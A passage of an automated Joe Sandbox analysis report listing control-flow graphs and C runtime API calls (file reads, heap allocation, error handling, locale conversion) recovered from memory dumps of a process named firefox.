      • Part of subcall function 6E107FA0: TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,6E107F6B), ref: 6E107FCD
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 555 6e0a8a48-6e0a8a55 556 6e0a8a5b-6e0a8a63 555->556 557 6e0e3324-6e0e3334 _errno call 6e107f60 555->557 558 6e0a8a69-6e0a8a76 556->558 559 6e0a8b29-6e0a8b2c 556->559 565 6e0e3339-6e0e3340 call 6e0abab2 557->565 558->559 561 6e0a8a7c-6e0a8a87 558->561 563 6e0a8afc-6e0a8b00 559->563 564 6e0a8a8d-6e0a8a9f call 6e0abab2 561->564 561->565 570 6e0a8b01-6e0a8b04 call 6e0a8e37 564->570 571 6e0a8aa1-6e0a8acd _fileno _read 564->571 565->559 576 6e0a8b09 570->576 572 6e0a8acf-6e0a8ad2 571->572 573 6e0a8b0b-6e0a8b25 call 6e0abab2 571->573 572->573 575 6e0a8ad4-6e0a8ad9 572->575 573->559 578 6e0a8adf-6e0a8ae9 575->578 579 6e0e3345-6e0e3351 _fileno 575->579 576->571 583 6e0a8aef-6e0a8af9 578->583 584 6e0e33a9-6e0e33ae 578->584 581 6e0e3388 579->581 582 6e0e3353-6e0e335f _fileno 579->582 586 6e0e338d-6e0e3394 581->586 582->581 585 6e0e3361-6e0e3386 _fileno * 2 582->585 583->563 587 6e0e33b0-6e0e33bb 584->587 588 6e0e33c3 584->588 585->586 586->578 590 6e0e339a-6e0e33a4 call 6e0abab2 586->590 587->588 589 6e0e33bd-6e0e33c0 587->589 589->588 590->578
    APIs
    • _fileno.UCRTBASE(?,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD), ref: 6E0A8AB3
      • Part of subcall function 6E0ABE80: _errno.UCRTBASE(?,?,6E0ABB21,?,?,?,?,?,?,6E0A386E), ref: 6E0E5400
      • Part of subcall function 6E0ABE80: _invalid_parameter_noinfo.UCRTBASE(?,?,6E0ABB21,?,?,?,?,?,?,6E0A386E), ref: 6E0E540B
    • _read.UCRTBASE(00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD), ref: 6E0A8ABA
      • Part of subcall function 6E0A8980: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD), ref: 6E0A89DD
      • Part of subcall function 6E0A8980: __doserrno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E32B7
      • Part of subcall function 6E0A8980: _errno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E32BF
      • Part of subcall function 6E0A8980: __doserrno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E32CC
      • Part of subcall function 6E0A8980: _errno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E32D4
      • Part of subcall function 6E0A8980: _errno.UCRTBASE(?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E32E1
      • Part of subcall function 6E0A8980: __doserrno.UCRTBASE(?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E32EC
      • Part of subcall function 6E0A8980: __doserrno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E3304
      • Part of subcall function 6E0A8980: _errno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E330C
      • Part of subcall function 6E0A8980: _invalid_parameter_noinfo.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E3317
      • Part of subcall function 6E0A8E37: _malloc_base.UCRTBASE(00001000,00000000,?,?,?,6E0AB8AD,00000008,00000002,?,?,?,?,6E0A56A2,?,?,6E0A43C5), ref: 6E0A8E4A
      • Part of subcall function 6E0A8E37: _free_base.UCRTBASE(00000000,00001000,00000000,?,?,?,6E0AB8AD,00000008,00000002,?,?,?,?,6E0A56A2,?), ref: 6E0A8E54
    • _errno.UCRTBASE(?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4), ref: 6E0E3324
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    • _invalid_parameter_noinfo.UCRTBASE(?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4), ref: 6E0E332F
    • _fileno.UCRTBASE(?), ref: 6E0E3348
    • _fileno.UCRTBASE(?), ref: 6E0E3356
    • _fileno.UCRTBASE(?), ref: 6E0E3365
    • _fileno.UCRTBASE(?), ref: 6E0E3371
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 640 6e0ac6b9-6e0ac6ce call 6e0ac40f 642 6e0ac6d3-6e0ac6da 640->642 643 6e0ac7b6-6e0ac7b8 642->643 644 6e0ac6e0-6e0ac712 call 6e0d5ad2 _wcstombs_s_l 642->644 645 6e0ac7b0-6e0ac7b5 643->645 648 6e0ac718-6e0ac729 call 6e0b36c0 644->648 649 6e0e55eb-6e0e55ee 644->649 656 6e0ac72f-6e0ac74b _wcstombs_s_l 648->656 657 6e0ac7ba-6e0ac7bc 648->657 650 6e0e5602-6e0e5607 649->650 651 6e0e55f0-6e0e55f3 649->651 654 6e0e5610 _invoke_watson 650->654 651->650 653 6e0e55f5-6e0e55f7 651->653 653->657 659 6e0e55fd 653->659 658 6e0e5615-6e0e5618 654->658 656->658 663 6e0ac751-6e0ac760 656->663 660 6e0ac7af 657->660 661 6e0e5609-6e0e560b 658->661 662 6e0e561a-6e0e561d 658->662 659->650 660->645 661->654 662->661 664 6e0e561f-6e0e5621 662->664 665 6e0e5633-6e0e5639 663->665 666 6e0ac766-6e0ac77f 663->666 664->663 668 6e0e5627-6e0e562d call 6e0b10e0 664->668 665->666 667 6e0e563f-6e0e565d call 6e0b10e0 665->667 669 6e0ac793-6e0ac7ab 666->669 670 6e0ac781-6e0ac78d 666->670 667->666 668->665 669->660 670->669 672 6e0e5662-6e0e5667 670->672 672->669 676 6e0e566d-6e0e5688 call 6e0b10e0 672->676 676->669
    APIs
      • Part of subcall function 6E0AC40F: _mbstowcs_s_l.UCRTBASE(?,00000000,00000000,?,7FFFFFFF,00000000,?,?,?,?,?,?,6E0AC6D3), ref: 6E0AC433
      • Part of subcall function 6E0AC40F: _calloc_base.UCRTBASE(?,00000002,?,?,?,6E0AC6D3,?,?,?,6E0AB72C), ref: 6E0AC448
      • Part of subcall function 6E0AC40F: _mbstowcs_s_l.UCRTBASE(00000000,00000000,?,?,000000FF,00000000,?,?,?,6E0AC6D3,?,?,?,6E0AB72C), ref: 6E0AC45E
      • Part of subcall function 6E0AC40F: _wsetlocale.UCRTBASE(?,00000000,?,?,?,?,?,?,?,?,?,6E0AC6D3,?,?,?,6E0AB72C), ref: 6E0AC472
      • Part of subcall function 6E0AC40F: _free_base.UCRTBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,6E0AC6D3,?,?,?,6E0AB72C), ref: 6E0AC47C
      • Part of subcall function 6E0AC40F: _wsetlocale.UCRTBASE(?,00000000,?,?,?,?,6E0AC6D3,?,?,?,6E0AB72C), ref: 6E0AC48E
      • Part of subcall function 6E0AC40F: _invoke_watson.UCRTBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,6E0AC6D3,?,?,?,6E0AB72C), ref: 6E0E54A2
      • Part of subcall function 6E0D5AD2: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,?,6E0AD8CA), ref: 6E0D5ADC
      • Part of subcall function 6E0D5AD2: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,6E0AD8CA), ref: 6E0D5B00
      • Part of subcall function 6E0D5AD2: abort.UCRTBASE(?,6E0AD8CA), ref: 6E0D5B06
      • Part of subcall function 6E0D5AD2: _calloc_base.UCRTBASE(00000002,00000364,?,6E0AD8CA), ref: 6E0D5B24
      • Part of subcall function 6E0D5AD2: _free_base.UCRTBASE(00000000,?,6E0AD8CA), ref: 6E0D5B3F
      • Part of subcall function 6E0D5AD2: _free_base.UCRTBASE(00000000,?,6E0AD8CA), ref: 6E0D5B6B
      • Part of subcall function 6E0D5AD2: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,6E0AD8CA), ref: 6E0D5B83
    • _wcstombs_s_l.UCRTBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,6E0AB72C), ref: 6E0AC708
      • Part of subcall function 6E0AC7D0: _errno.UCRTBASE(?,?,?,?,6E0A4CFB,?,?,?,?,?,00000000), ref: 6E0E568D
      • Part of subcall function 6E0AC7D0: _invalid_parameter_noinfo.UCRTBASE(?,?,?,?,6E0A4CFB,?,?,?,?,?,00000000), ref: 6E0E5697
      • Part of subcall function 6E0AC7D0: _errno.UCRTBASE(?,?,?,?,?,6E0A4CFB,?,?,?,?,?,00000000), ref: 6E0E56A3
      • Part of subcall function 6E0AC7D0: _errno.UCRTBASE(?,?,?,?,?,6E0A4CFB,?,?,?,?,?,00000000), ref: 6E0E56B3
      • Part of subcall function 6E0AC7D0: _errno.UCRTBASE(?,?,?,?,?,6E0A4CFB,?,?,?,?,?,00000000), ref: 6E0E56CC
      • Part of subcall function 6E0AC7D0: _invalid_parameter_noinfo.UCRTBASE(?,?,?,?,?,6E0A4CFB,?,?,?,?,?,00000000), ref: 6E0E56D6
    • _malloc_base.UCRTBASE(-00000004,?,?,?,?,?,?,?,6E0AB72C), ref: 6E0AC71F
      • Part of subcall function 6E0B36C0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?), ref: 6E0B36DF
      • Part of subcall function 6E0B36C0: _callnewh.UCRTBASE(00000001,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E82F9
      • Part of subcall function 6E0B36C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E830E
      • Part of subcall function 6E0B36C0: _errno.UCRTBASE(?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E831D
    • _wcstombs_s_l.UCRTBASE(00000000,00000004,00000000,?,000000FF,?,?,?,?,?,?,?,?,6E0AB72C), ref: 6E0AC741
    • _invoke_watson.UCRTBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,6E0AB72C), ref: 6E0E5610
      • Part of subcall function 6E107FA0: IsProcessorFeaturePresent.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000017,00000000,6E107E9E,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6E107F6B), ref: 6E107FA5
      • Part of subcall function 6E107FA0: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000417,?,?,?,?,6E107F6B), ref: 6E107FC6
      • Part of subcall function 6E107FA0: TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,6E107F6B), ref: 6E107FCD
    • _free_base.UCRTBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E0E5628
    • _free_base.UCRTBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E0E5649
    • _free_base.UCRTBASE(?), ref: 6E0E5677
      • Part of subcall function 6E0B10E0: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0B10F5
      • Part of subcall function 6E0B10E0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71DB
      • Part of subcall function 6E0B10E0: _errno.UCRTBASE(?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71EA
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 697 6e0b61e0-6e0b6206 call 6e0b0cb0 700 6e0b620c-6e0b6215 697->700 701 6e0b62ab-6e0b62ad 697->701 702 6e0b6217-6e0b621b 700->702 703 6e0b628f 700->703 704 6e0b6290-6e0b62aa call 6e0b10e0 call 6e0c8f30 701->704 705 6e0b6220-6e0b6237 702->705 703->704 708 6e0b623d-6e0b623f 705->708 709 6e0e8e21-6e0e8e2a InitializeCriticalSectionAndSpinCount 705->709 711 6e0e8df5 708->711 712 6e0b6245-6e0b6289 708->712 715 6e0e8e35-6e0e8e45 GetProcAddress 709->715 714 6e0e8dfa-6e0e8e03 call 6e0b5eb9 711->714 712->705 728 6e0b628b-6e0b628e 712->728 714->715 724 6e0e8e05-6e0e8e0e 714->724 716 6e0e8e10-6e0e8e1f call 6e0b5dfe 715->716 717 6e0e8e47-6e0e8e59 call 6e0b5dfe 715->717 716->709 717->709 727 6e0e8e5b 717->727 724->714 724->716 727->727 728->703
    APIs
    • _calloc_base.UCRTBASE(00000040,00000030,00000000,?,?,?,?,6E0E0A7B,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001), ref: 6E0B61F7
      • Part of subcall function 6E0B0CB0: RtlAllocateHeap.NTDLL(00000008,00000001,?,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0B0CE1
      • Part of subcall function 6E0B0CB0: _callnewh.UCRTBASE(00000001,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E70C0
      • Part of subcall function 6E0B0CB0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000001,?,?,?,?,?,?,?,?,?,?,6E0A21C2,00000001), ref: 6E0E70D5
      • Part of subcall function 6E0B0CB0: _errno.UCRTBASE(?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E70E4
    • _free_base.UCRTBASE(00000000,?,00000000,?,?,?,?,6E0E0A7B,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001), ref: 6E0B6292
      • Part of subcall function 6E0B10E0: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0B10F5
      • Part of subcall function 6E0B10E0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71DB
      • Part of subcall function 6E0B10E0: _errno.UCRTBASE(?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71EA
      • Part of subcall function 6E0B5EB9: LoadLibraryExW.KERNELBASE(00000003,?,00000800,00000003,6E086D50,?,6E0E7181,?,?,?,?,6E0A2161), ref: 6E0B5ED9
      • Part of subcall function 6E0B5EB9: FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,?,00000800,00000003,6E086D50,?,6E0E7181,?,?,?,?,6E0A2161), ref: 6E0B5F03
      • Part of subcall function 6E0B5EB9: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000800,00000003,6E086D50,?,6E0E7181,?,?,?,?,6E0A2161), ref: 6E0E8CC5
      • Part of subcall function 6E0B5EB9: wcsncmp.UCRTBASE(00000003,api-ms-,00000007,?,00000800,00000003,6E086D50,?,6E0E7181,?,?,?,?,6E0A2161), ref: 6E0E8CD8
      • Part of subcall function 6E0B5EB9: wcsncmp.UCRTBASE(00000003,ext-ms-,00000007), ref: 6E0E8CEC
      • Part of subcall function 6E0B5EB9: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000003,00000000,00000000), ref: 6E0E8CFD
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(-00000040,00000FA0,?,00000180,?,00000000,?,?,?,?,6E0E0A7B,?,6E0BDF2B,00000000,00000180,00000000), ref: 6E0E8E2A
    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,InitializeCriticalSectionEx,?,00000180,?,00000000,?,?,?,?,6E0E0A7B,?,6E0BDF2B,00000000,00000180,00000000), ref: 6E0E8E3B
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
      • Part of subcall function 6E0AF6C0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000001,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF6D3
      • Part of subcall function 6E0AF6C0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF710
      • Part of subcall function 6E0AF6C0: TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000003,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0AF72A
      • Part of subcall function 6E0AF6C0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,FlsGetValue,?,?,?,6E0E70B2,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0DE97E
      • Part of subcall function 6E0B3DC0: abort.UCRTBASE(00007FFF,?,?,?,?,6E0B6088,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF,?,?,6E0A5309), ref: 6E0B3E6F
      • Part of subcall function 6E0B3DC0: _calloc_base.UCRTBASE(00000002,00000364,00007FFF,?,?,?,?,6E0B6088,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF), ref: 6E0E8404
      • Part of subcall function 6E0B3DC0: _free_base.UCRTBASE(00000000,00007FFF,?,?,?,?,6E0B6088,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF), ref: 6E0E842F
      • Part of subcall function 6E0B3DC0: _free_base.UCRTBASE(00000000,00007FFF,?,?,?,?,6E0B6088,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF), ref: 6E0E844E
      • Part of subcall function 6E0B610D: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00007FFF,?,?,?,?,6E0B608D,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF,?,?,6E0A5309), ref: 6E0B6116
      • Part of subcall function 6E0B610D: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6E0B608D,00007FFF), ref: 6E0B6139
      • Part of subcall function 6E0B610D: _malloc_base.UCRTBASE(00000000,?,?,?,?,6E0B608D,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF,?,?,6E0A5309), ref: 6E0B6147
      • Part of subcall function 6E0B610D: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6E0B608D,00007FFF), ref: 6E0B615F
      • Part of subcall function 6E0B610D: _free_base.UCRTBASE(00000000,?,?,?,?,6E0B608D,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF,?,?,6E0A5309), ref: 6E0B616E
      • Part of subcall function 6E0B610D: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,?,?,?,6E0B608D,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF,?,?,6E0A5309), ref: 6E0B6179
    • _free_base.UCRTBASE(00000000,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF,?,?,6E0A5309), ref: 6E0B60B1
    • _free_base.UCRTBASE(00000000,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF,?,?,6E0A5309), ref: 6E0B60B8
      • Part of subcall function 6E0B10E0: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0B10F5
      • Part of subcall function 6E0B10E0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71DB
      • Part of subcall function 6E0B10E0: _errno.UCRTBASE(?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71EA
      • Part of subcall function 6E0B0C00: _calloc_base.UCRTBASE(00000001,00000004,00007FFF,00000000), ref: 6E0B0C16
      • Part of subcall function 6E0B0C00: _calloc_base.UCRTBASE(00000002,00000001,00000000), ref: 6E0B0C49
      • Part of subcall function 6E0B0C00: strcpy_s.UCRTBASE(00000000,00000002,00000000,?,?,00000000), ref: 6E0B0C5E
      • Part of subcall function 6E0B0C00: _free_base.UCRTBASE(00000000,?,?,?,?,?,00000000), ref: 6E0B0C7B
      • Part of subcall function 6E0B0C00: _free_base.UCRTBASE(00000000,00000000), ref: 6E0B0C8F
      • Part of subcall function 6E0B0C00: _invoke_watson.UCRTBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 6E0E7091
      • Part of subcall function 6E0B0C00: _free_base.UCRTBASE(00000000,?,?,00000000), ref: 6E0E70A0
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • _free_base.UCRTBASE(00000000,00007FFF,?,?,?,?,6E0B6088,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF), ref: 6E0E844E
      • Part of subcall function 6E0AF620: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,FlsGetValue,00000000,?,00000004,?,6E0ACF64,?,00000000,?,6E0E5DEB), ref: 6E0AF686
      • Part of subcall function 6E0AF620: TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000004,00000000,?,00000004,?,6E0ACF64,?,00000000,?,6E0E5DEB), ref: 6E0AF6AB
      • Part of subcall function 6E0B3E7C: _malloc_base.UCRTBASE(00000220,00007FFF,00000000,00000002), ref: 6E0B3EB7
      • Part of subcall function 6E0B3E7C: _free_base.UCRTBASE(00000000,00007FFF,00000000,00000002), ref: 6E0B3F70
      • Part of subcall function 6E0B3E7C: _errno.UCRTBASE(00007FFF,00000000,00000002), ref: 6E0E8459
      • Part of subcall function 6E0B3E7C: _free_base.UCRTBASE(6E1553C0), ref: 6E0E848B
    • abort.UCRTBASE(00007FFF,?,?,?,?,6E0B6088,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF,?,?,6E0A5309), ref: 6E0B3E6F
      • Part of subcall function 6E109180: raise.UCRTBASE(00000016,?,?,?,00000000), ref: 6E1091AD
      • Part of subcall function 6E109180: IsProcessorFeaturePresent.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000017,?,?,?,00000000), ref: 6E1091BE
      • Part of subcall function 6E109180: _exit.UCRTBASE(00000003,?,?,?,00000000), ref: 6E1091DC
      • Part of subcall function 6E0AD3EF: TlsSetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000004,?,00000000,?,?,00000004,?,6E0E5A4D,?,00000000,?,6E0E5DEB), ref: 6E0AD442
    • _calloc_base.UCRTBASE(00000002,00000364,00007FFF,?,?,?,?,6E0B6088,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF), ref: 6E0E8404
      • Part of subcall function 6E0B0CB0: RtlAllocateHeap.NTDLL(00000008,00000001,?,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0B0CE1
      • Part of subcall function 6E0B0CB0: _callnewh.UCRTBASE(00000001,?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E70C0
      • Part of subcall function 6E0B0CB0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000001,?,?,?,?,?,?,?,?,?,?,6E0A21C2,00000001), ref: 6E0E70D5
      • Part of subcall function 6E0B0CB0: _errno.UCRTBASE(?,6E0E5A61,00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E70E4
    • _free_base.UCRTBASE(00000000,00007FFF,?,?,?,?,6E0B6088,00007FFF,?,?,6E0EAE2A,?,6E0BAA2B,00007FFF), ref: 6E0E842F
      • Part of subcall function 6E0B10E0: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0B10F5
      • Part of subcall function 6E0B10E0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71DB
      • Part of subcall function 6E0B10E0: _errno.UCRTBASE(?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71EA
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
